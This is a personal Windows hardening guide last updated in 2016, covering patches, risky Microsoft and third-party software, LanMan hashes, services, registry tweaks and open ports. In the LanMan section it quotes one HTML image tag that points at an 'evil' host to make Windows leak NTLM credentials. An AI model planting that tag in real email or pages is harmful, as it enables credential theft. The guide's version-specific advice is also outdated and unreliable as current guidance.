Secure your PC

With all the hullabaloo about the virus or worm du jour, you may want to make your Windows PC more secure. See disclaimer at end. You should also check out the Stay Smart Online site, the ASD tips and mitigations, the AusCERT Protecting info, some US-CERT publications, the NSA security guides, the NIST guides and checklists and the CIS benchmarks.


Contents


Commonsense, common settings

Anti-Virus issues

Firewall issues

E-commerce and webmail

Backups

Disable unused features

Solution?


14 Sep 16

Install Microsoft patches

The list of patches you need to install is dauntingly long, still it is imperative to stay up-to-date with patches (but see BEWAREs below). The last couple of patches released are:

Reference(s):
http://technet.microsoft.com/security/default
http://technet.microsoft.com/security/bulletin
http://technet.microsoft.com/security/advisory
http://blogs.technet.microsoft.com/msrc/
http://blogs.technet.microsoft.com/srd/
http://blogs.technet.microsoft.com/mmpc/

NOTE that Monthly Rollup updates are coming for Win7 and Win8.1.
BEWARE that some patches may make your machine inoperable (e.g. KB3114717, MS14-045, MS13-057 or MS13-036).
BEWARE that M$ patches do not address all known vulnerabilities.
BEWARE that installing patches or upgrading M$ software may un-install or un-do seemingly unrelated patches (e.g. re-install outdated Flash or libraries).
BEWARE that installing any patches may overwrite any customizations (may need to undo them to install the patch): re-check and re-do all your changes as below.
BEWARE that M$ often changes the underlying patches without updating the bulletins or KB articles, sometimes changing the file binaries without updating version numbers.
BEWARE that even big companies make mistakes and may release broken or unwanted patches.
NOTE that WinXP and Office2003 are now out of support, see the Support Lifecycle Index (but maybe you can get WinXP updates to 2019).

Check out the Microsoft Security Tool Kit http://www.microsoft.com/technet/security/tools/stkintro.mspx.
Beware that Microsoft Baseline Security Analyzer http://www.microsoft.com/technet/security/tools/mbsahome.mspx requires IE (with ActiveX?) and maybe other services (see http://support.microsoft.com/kb/320454) thus opening the machine up.
Note that Windows Update may have difficulties identifying what patches are already installed or are required; needs IE and ActiveX with low security settings; may ignore your do not install option ... and may not know about Office or SQL. You may also need to use Office Update and/or Microsoft Update.

USyd users please note the site licences for MS software and the local WSUS (and old SUS) server.


20 Apr 16

Do not use Internet Explorer or Edge

IE has a long history of vulnerabilities, left un-fixed for years: do not use. Note that IE is used for many registered File Types and you may want to remove them, or use regedit to search for and clobber most occurrences of iexplore. It may be best to rename the software so it is not accessible.

Use Mozilla instead.

Note that you still need to keep IE up-to-date with patches, and set secure IE options (even if you do not use IE), for the many Web-enabled applications. Windows Explorer in particular will internally handle HTTP and FTP URLs, disregarding the "URL protocol handler" in the registry, and is certainly unsafe without careful IE option settings. I wonder if Word can do JavaScript or VBS in a safe way... So occasionally you will need to rename the sofware back in place, patch it, start it up and set secure options, then hide it again.
To set secure options, go to Tools > Internet Options, then select Security and Advanced tabs (in Security, set things to Custom to have fun): see

You may also use third-party "IE hardeners":

IE11 (for Win8.1 then Win7) was released Oct-Nov13 with "better compatibility", "state of the art performance" and "advanced consumer security":

Support for versions prior to IE11 has ceased on 12 Jan 2016, see: https://www.microsoft.com/en-us/WindowsForBusiness/End-of-IE-support

In Windows10, IE is replaced by Microsoft Edge that is claimed to be more secure (e.g. note how ActiveX is termed "older, less secure").

Reference(s) (see IE history for more):


4 Apr 14

Do not use Access or Outlook (or Excel or Word)

There are bugs in MSAccess that allow the execution of any VBA macros; bugs remain in Outlook that allow execution of arbitrary code. Do not use: rename Access, Outlook and VBA (also DAO: used in ihackstuff exploit) so they are not accessible. (Do other MS Office components too: at least Excel, preferably most others even Word, at the same time.)
Use OpenOffice instead.

Reference(s):


31 Aug 16

Set Word options

Apply some protection settings in MSWord against harmful macros. (Would be tempting to disable Word along with the rest of MS Office, but...)

Reference(s):

If you use Office XP or 2003, then beware of it sending debugging information, containing your sensitive documents, to Microsoft. Use regedit to set:
for Office XP, DWNeverUpload, DWNoExternalURL, DWNoFileCollection and DWNoSecondLevelCollection to 1 in both [HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\10.0\Common] and [HKEY_USERS\.Default\Software\Policies\Microsoft\Office\10.0\Common];
for Office 2003, QMEnable to 0 in [HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\Common].

Reference(s):

Apply privacy settings, or your document will contain unwanted information.

Reference(s):


9 Jan 13

Banish LanMan passwords

If you use any Windows passwords, e.g. to connect to a Samba server, then ensure that only NTLM or NTLMv2 password hashes are used. The older LM hash is insecure as it can be cracked easily. (Cracking NTLM hashes is significantly harder, see L0phtCrack.) Both LM and NTLM hashes are replayable: there may be no need to crack them. Windows may be tricked into revealing your credentials, e.g. by using  <img src=file:\\evil\pub.gif>  in an HTML email or web page. Use NTLMv2 hashes if possible.

Need to set my Samba server not to accept an LM hash ("lanman auth = no" in smb.conf; check also "min protocol"). This does not buy much per se: if the attacker has the LM hash, then he could crack the password and win; or he could replay the NTLM hash as he is likely to also have that. As the user is likely to have the same password elsewhere, we should protect against crackable LM hashes even if we are vulnerable to NTLM hash replays. Configure clients so they never send an LM hash; by hacking Samba to actively reject users who send an LM hash, clients can be forced to update their settings. - Samba 3.0.5 supports NTLMv2 but not message encryption (Samba 2.2.8a does not support either).

To use NTLMv2 authentication on Win9x, you need to install the Directory Services Client (in Clients\Win9x\Dsclient.exe on the Windows2000 Server CD). You can then un-install this client: the NTLMv2 support files will stay behind. - Seems that Win9x can only do LM or NTLMv2, and cannot do NTLM authentication (which makes sense as the only allowed values of LMCompatibility are 0 or 3). (Samba 2.2.8a and Win9x cannot communicate securely.)

Use regedit to:

Reference(s):


19 Jan 06

Disable unused services

This is a bit long... see sub-sections on services, network and registry settings, see what ports are open, and some further checking.

Services setup

Disable the services you do not need in My Computer (right-click) > Manage > Services and Applications > Services.


My WinXP home computer happily survives with just

  Name                                  Status  Startup Type

  Application Management                        Disabled
  COM+ Event System                     Started Manual
  DHCP Client                           Started Automatic
  DNS Client                            Started Automatic
  Event Log                             Started Automatic
  Human Interface Device Access                 Disabled
  LexBce Server                         Started Automatic (my Lexmark printer?)
  Messenger                                     Disabled
  Network Connections                   Started Manual
  Network Location Awareness (NLA)      Started Manual
  Plug and Play                         Started Automatic
  Print Spooler                         Started Automatic
  Protected Storage                     Started Automatic
  Remote Access Connection Manager      Started Manual
  Remote Procedure Call (RPC)           Started Automatic
  Routing and Remote Access                     Disabled
  Security Accounts Manager             Started Automatic
  Server                                Started Automatic
  SSDP Discovery Service                        Disabled
  System Event Notification             Started Manual
  Task Scheduler                                Disabled
  Telephony                             Started Manual
  Terminal Services                     Started Manual
  Windows Audio                         Started Automatic
  Windows Management Instrumentation    Started Manual
  Workstation                           Started Automatic
(rest are manual startup and not running).


My WinXP work PC (hanging off a Samba PDC) has (excessive, unsafe?)

  Name                                  Status  Startup Type

  Alerter                               Started Automatic
  Application Layer Gateway Service     Started Manual
  Automatic Updates                             Disabled
  Background Intelligent Transfer Serv          Disabled
  ClipBook                                      Disabled
  COM+ Event System                     Started Manual
  Computer Browser                      Started Automatic
  DCOM Server Process Launcher          Started Automatic
  DHCP Client                           Started Automatic
  DNS Client                                    Disabled
  Error Reporting Service                       Disabled
  Event Log                             Started Automatic
  Help and Support                              Disabled
  HID Input Service                     Started Automatic
  Messenger                             Started Automatic
  MS Software Shadow Copy Provider              Disabled
  Net Logon                             Started Automatic
  NetMeeting Remote Desktop Sharing             Disabled
  Network Connections                   Started Manual
  Network DDE                                   Disabled
  Network DDE DSDM                              Disabled
  Network Location Awareness (NLA)      Started Manual
  Performance Logs and Alerts                   Disabled
  Plug and Play                         Started Automatic
  Print Spooler                         Started Automatic
  Protected Storage                     Started Automatic
  Remote Access Auto Connection Manager         Disabled
  Remote Access Connection Manager              Disabled
  Remote Procedure Call (RPC)           Started Automatic
  Routing and Remote Access                     Disabled
  Secondary Logon                       Started Automatic
  Security Accounts Manager             Started Automatic
  Security Center                               Automatic
  Server                                Started Automatic
  Shell Hardware Detection              Started Automatic
  Smart Card                                    Disabled
  SoundMAX Agent Service                Started Automatic
  SSDP Discovery Service                        Disabled
  System Event Notification             Started Automatic
  System Restore Service                        Disabled
  Telnet                                        Disabled
  Terminal Services                     Started Manual
  Themes                                Started Automatic
  User Profile Hive Cleanup             Started Automatic
  Volume Shadow Copy                            Disabled
  WebClient                             Started Automatic
  Windows Audio                         Started Automatic
  Windows Firewall/ICS                  Started Automatic
  Windows Management Instrumentation    Started Manual
  Windows Time                          Started Automatic
  WinMonitor                            Started Automatic (home-grown management)
  Wireless Zero Configuration                   Disabled
  Workstation                           Started Automatic
(rest are manual startup and not running).


Network setup

Find your network connections (devices, interfaces) in
Start Menu > [ Settings or Control Panel ? ] > Network and Dial-up Connections
and their properties in
Local Area Connection > Properties     or
Dial-up > Properties > Networking.
Completely disable unused network interfaces, particularly wireless interfaces on itinerant laptops.
Decide if any are "trusted" networks: your dial-up internet connection is certainly un-trusted. My home PCs trust the LAN interface: my other PC (only) is on that network, and I want them to share everything.

Ensure all un-trusted connections have
File and printer sharing for Microsoft Networks
disabled. You should only have
Client for Microsoft Networks     and
Internet Protocol (TCP/IP)
listed among the protocols/services used. My home PCs show:

Dial-up, Properties, Networking, "... uses the following items":
    [x]  Internet Protocol (TCP/IP)
    [ ]  File and Printer Sharing for Microsoft Networks
    [x]  Client for Microsoft Networks

Local Area Connection, Properties, "... uses the following items":
    [x]  Client for Microsoft Networks
    [x]  File and Printer Sharing for Microsoft Networks
    [x]  Internet Protocol (TCP/IP)
while my work PC has
Local Area Connection, Properties, "... uses the following items":
    [x]  Client for Microsoft Networks
    [x]  Internet Protocol (TCP/IP)
You should enable File and printer sharing on trusted networks only, and only if you really intend to let anyone see (and delete or change) your files. (It may be possible to have sharing with controls on who can do what, but is beyond my abilities.) You may un-install File and printer sharing if no network interfaces need it. Do not delete Client for Microsoft Networks as some dial-up features rely on it.

Ensure all un-trusted connections have
Disable NetBIOS over TCP/IP
selected in Internet Protocol (TCP/IP) > Properties > Advanced > WINS.
My home PCs have more-or-less:

Dial-up, Properties, Networking, Internet Protocol (TCP/IP), Properties,
(Automatic IP and DNS), Advanced, WINS: "Disable NetBIOS over TCP/IP".

Local Area Connection, Properties, Internet Protocol (TCP/IP), Properties,
Advanced:
  IP 192.168.111.112, netmask 255.255.255.0
  Gateway (none)
  DNS server 192.168.111.111
  WINS server 192.168.111.111
  Enable NetBIOS over TCP/IP
while my work PC has
Local Area Connection, Properties, Internet Protocol (TCP/IP), Properties,
(Automatic IP and DNS), Advanced, WINS: "Use NetBIOS setting from DHCP server".


Registry setup

Use regedit to set:

 HKLM\SYSTEM\CurrentControlSet\Control\Lsa\LmCompatibilityLevel=3
 HKLM\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
 HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RestrictAnonymous=0 (could be 1?)
 HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters\MaxWorkItems=256
 HKLM\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\SmbDeviceEnabled=0
 HKLM\SYSTEM\CurrentControlSet\Services\Rpc\Linkage\Bind=(empty, REG_MULTI_SZ or REG_SZ)
 HKLM\SYSTEM\CurrentControlSet\Services\RpcSs\ListenOnInternet=N
 HKLM\SOFTWARE\Microsoft\Ole\EnableDCOM=N
 HKLM\SOFTWARE\Microsoft\Rpc\DCOM Protocols=(not including ncacn_ip_tcp)

Reference(s):

Am I now safe even without MS03-026, MS03-039, MS03-049, MS04-011 or MS04-012 patches in place? My home PC has survived Blaster, Welchia and Sasser; my office machine is behind a firewall, so has not been tested.


Ports open

My home PCs have only a few ports open:

C:\> netstat -ano
Active Connections
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:1026           0.0.0.0:0              LISTENING       4
  TCP    192.168.111.112:139    0.0.0.0:0              LISTENING       4
  UDP    0.0.0.0:1029           *:*                                    796
  UDP    192.168.111.112:137    *:*                                    4
  UDP    192.168.111.112:138    *:*                                    4
(On Win2k use just  netstat -an , or TCPView from http://www.sysinternals.com/ to show process IDs.)

TaskManager shows (among others):

Image Name      PID     User Name
SVCHOST.EXE     796     NETWORK SERVICE
System          4       SYSTEM

The line
  TCP    0.0.0.0:1026           0.0.0.0:0              LISTENING       4
is due to the Remote Access Connection Manager service; you need it for dial-up connections (set it to disabled and reboot to see the port go away, along with your dial-up settings). This port seems harmless, not actually open as  telnet localhost 1026  fails, same as any other non-open port. (Using hping also confirms the port is not open.) Surely it is a bug in System:4 that it opens but forgets to close the port.

The line
  UDP    0.0.0.0:1029           *:*                                    796
seems to appear some minutes after boot only.

The connections shown by netstat do not change when I dial-up connect.

My work PC has open:

C:\>netstat -an
Active Connections
  Proto  Local Address          Foreign Address        State
  TCP    129.78.94.2:139        0.0.0.0:0              LISTENING
  UDP    129.78.94.2:137        *:*
  UDP    129.78.94.2:138        *:*
Maybe all those are needed...


Further checks

Check the registry for processes started at boot or login time, ensure all are legitimately needed.

Reference(s):

I wonder if it would be possible or useful to set

 DisableIPSourceRouting=2
 EnableDeadGWDetect=0
 EnableICMPRedirect=0
 EnablePMTUDiscovery=0
 NoNameReleaseOnDemand=1
 PerformRouterDiscovery=0
 SynAttackProtect=2
in both
 HKLM\System\CurrentControlSet\Services\AFD\Parameters
 HKLM\System\CurrentControlSet\Services\Tcpip\Parameters

Reference(s):


3 Jun 16

Do not rely on WinXP/Vista/7/8/10 security

Do not assume that WinXP, Vista, Win7, 8 or 10 are secure, but expect local users to easily get "administrator" privileges: Windows has bad design, foolish defaults, and some bugs for attackers to exploit.

Still, you should not normally log in as Administrator, but as some low-level user; and should protect the machine from low-level users, e.g. with sensible file and registry permissions. Then malware will not be able to install themselves as system services (foiling a number of viruses): see e.g.

(Power users getting admin is a "known bug" http://support.microsoft.com/kb/825069 .)

Reference(s):

I fail to see how Windows 2000 got "Common Criteria" certification. Maybe because they assume a "friendly" network and "cooperating" users ... but isn't any computer secure under those circumstances?

Reference(s):


21 Sep 16

Use Firefox 49.0, Thunderbird 45.3.0

Use Firefox 49.0 (browser) and Thunderbird 45.3.0 (mail client). Mozilla is actively maintained, free of old known bugs.

As mentioned above: turn Java off in Tools > Options > Content.

Reference(s):


Netscape Navigator has reached End of Support and they recommend to use Firefox.

Or you may want to use Chrome or Opera or Safari (all have security problems, I just do not keep track of those).


12 Aug 16

Use Acrobat XI 11.0.17

There are vulnerabilities in older Acrobat reader versions, maybe fixed in 11.0.17: see http://get.adobe.com/reader/otherversions (and FTP site).

BEWARE: PDF files may carry active content, so are also dangerous. In Edit > Preferences set:

See also the NSA "Recommendations for Configuring Adobe Acrobat Reader XI in a Windows Environment".

Reference(s):


12 Jun 07

Do not use Eudora

Eudora version 6.2.1 was released 21 Jan 05; the release notes said the attachment spoof issue was fixed. Then 6.2.3 was released 17 Jun 05 ... and 7.1 on 11 Oct 06 (no new security issues mentioned in the release notes); should do a "regression test" but have not yet (and may never get around to: we at Maths do not use Eudora anymore).
Use Mozilla instead. Note also that Eudora will become free, open-source and Mozilla-based sometime in 2007, see http://www.eudora.com/faq/, http://www.mozilla.com/press/mozilla-2006-10-11.html and http://wiki.mozilla.org/Penelope; I hope it will be "safe" then.

With its penchant to pre-extract attachments, Eudora is a prime carrier to inject arbitrary code into IE's fatuously trusted zone of local files.

The "file URL buffer overflow" bug (exploitable to execute arbitrary code, verified on versions 5.2.1, 6.0.3 and 6.1) seems fixed since 6.1.1.
The "long spoofed attachment name" buffer overflow (exploitable to execute arbitrary code in versions 5.2.1 and 6.0) seems fixed in 6.0.1 and 6.0.3, was un-fixed (exploitable) in 6.1, then seems fixed again since 6.1.1.
The X - X.exe dichotomy issue seemed fixed in 6.0 to 6.1 (though LaunchProtect worked within the  attach  folder only), was un-fixed (broken) in 6.1.1, then seems fixed again since 6.1.2.
Eudora 5.2.1 was vulnerable to the "evil IMAP server" exploit: connect to trusted servers only. Do not know if this was fixed in 6.0.

If you still insist on using Eudora, you must disable both Allow executables in HTML content and Use Microsoft's viewer in Tools > Options > Viewing Mail; you may also want to disable Automatically download HTML graphics in Tools > Options > Display. I am not sure if setting the attachment directory to be non-executable is useful.

Reference(s):


28 Sep 16

Third party software

Need to keep various other third party software updated.
See sub-sections on Java,
messengers AIM, MSN, YIM, ICQ, mIRC, Skype
and media players RealPlayer, Winamp, Windows Media Player, QuickTime, Flash.

The list here is not exhaustive but only the common software I knew about; and is not in order of importance. Some third party software (IE, Firefox, MSWord, Acrobat, Eudora) singled out elsewhere.


Java or latest needs to be kept up-to-date (and/or removed and/or disabled in the browser).

Reference(s):


There are vulnerabilities in AIM (AOL Instant Messenger).

Reference(s):


Do not use MSN Messenger as it has privacy problems (combine that with cross-site-scripting problems on MS sites...); servers are misconfigured; and it can be hijacked.

Reference(s):


Need to update YIM.

Reference(s):


Need to update ICQ.

Reference(s):


Need to update mIRC.

Reference(s):


Vulnerabilities have been found in Skype, and you should update the software.

Reference(s):


Vulnerabilities have been found in RealPlayer, and you should update the software.

Reference(s):


Vulnerabilities have been found in Winamp, and you should update the software.

Reference(s):


Windows Media Player seems to have security problems: it will run a WMA or WMF file as such, even when renamed; and even though it is not the default MP3 player. Use e.g. RealPlayer or Winamp instead, and un-install WMP. Note also that both WMP and RealPlayer may be "tricked" via files named WAV or MP3 that in fact contain something else.

Reference(s):


Should un-install Apple QuickTime Player: no longer supported or needed on Windows.

Reference(s):


Upgrade Flash and Shockwave players; or remove them altogether...

Reference(s):


1 Jul 13

Beware of long filenames

Long filename extensions: no patch or workaround yet (thankfully no remote exploit either). Explorer crashes, probably exploitable as a buffer overflow encoded into the extension.

Reference(s):

Long NTFS filenames: some software packages (Windows Explorer and CMD.EXE included) may not be able to access long NTFS pathnames.

Reference(s):


20 Jun 00

Disable WSH, VBS, CHM, Scrap

WSH is Windows Script Host. To disable, rename the relevant files; or for Windows 98, un-install it: select Start Menu > Settings > Control Panel > Add/Remove Programs > Windows Setup tab > Accessories and make sure Windows Scripting Host is deselected (no checkmark).

Reference(s):

Delete VBS VBScript (Visual Basic) Script File from the registered File Types list or use regedit to clobber the command to open them, or rename the software so it is not accessible. (VBS files may not be listed after you disabled WSH.) Delete VBE VBScript Encoded Script File also. Other file types (such as REG files) may also be dangerous, and can be removed/clobbered for a more secure system.

Reference(s):

Delete CHM Compiled HTML file from the registered File Types list or clobber the command with regedit, or rename the software so it is not accessible. Note that there are CHM files in C:\windows\help\ and then you may not be able to use them.

Reference(s):

To disable scrap files, alter or remove File Types SHS and SHB or clobber the command shscrap.dll with regedit, or rename the software so it is not accessible.

Reference(s):


14 Feb 01

Un-hide file types

Make Windows show all file types (extensions): EXE files, scrap files, VBS scripts, PIF and LNK file attachments ... (sent by email?).


11 Nov 05

Miscellaneous settings

You may want to be careful with what "legit" software you install. In particular, you may want to turn off autoplay on your CD drive (as mentioned above).

Reference(s):


Under Win2k/NT, a user can lock files so that no other user can access them. (This may include logon scripts and files to set security policies...) This is a Windows design "feature", with no fix planned. (Or, are "group policies" but not logon scripts et al, fixed in MS02-016??)

Reference(s):


Though not security issues, Microsoft should not be rude to its competitors, should not engage in software piracy nor infringe patents.

Reference(s):


9 Sep 16

Physical security

I seem to have neglected physical security. Generally, once an attacker has access to the keyboard/screen of your computer, he can do any "bad things" he likes: You may need to have your computer room locked with a key.

Reference(s):


10 Oct 04

Recover from compromise

If your PC has been compromised (e.g. infected with some virus), and you would like to return it to a safe state, then you really should re-install it from scratch: re-format the hard disk and re-install Windows and all software, from safe media (e.g. original CDs).

If it had been infected with a "known virus" then maybe your anti-virus product can clean it up. However, can you be sure that was the only compromise: that there were no other as-yet-undetected viruses, or maybe some specific (personally directed) malware lurking?

You need to secure your newly installed PC before first connecting it to the internet (e.g. to read these instructions on how to keep it secure, or to use WindowsUpdate): at the height of the Blaster and Sasser worms, unprotected PCs were infected within a minute of connection. Print out these instructions, then re-format and re-install everything, and configure things to keep safe.


Disclaimer

Only Windows PCs are considered here. I do not keep track of Mac or MacOSX or of UNIX or Linux issues. - I only care about two or three kinds of Windows PC: Only issues of relevance to my setups are listed, some generalities first, then in apparently random order. Advice here may not be applicable to some Windows versions or other configurations. In particular I blissfully ignore IIS and SQL.

There are many security issues not covered here, either because I never knew about them, or because I did not think they were relevant to my setups. Do not rely solely on my advice. Conversely, following any advice here may render your computer inoperable. Use at your own risk. - Please let me know if I missed something obvious, or if any of the advice above gave you trouble.


Paul Szabo psz@maths.usyd.edu.au 28 Sep 16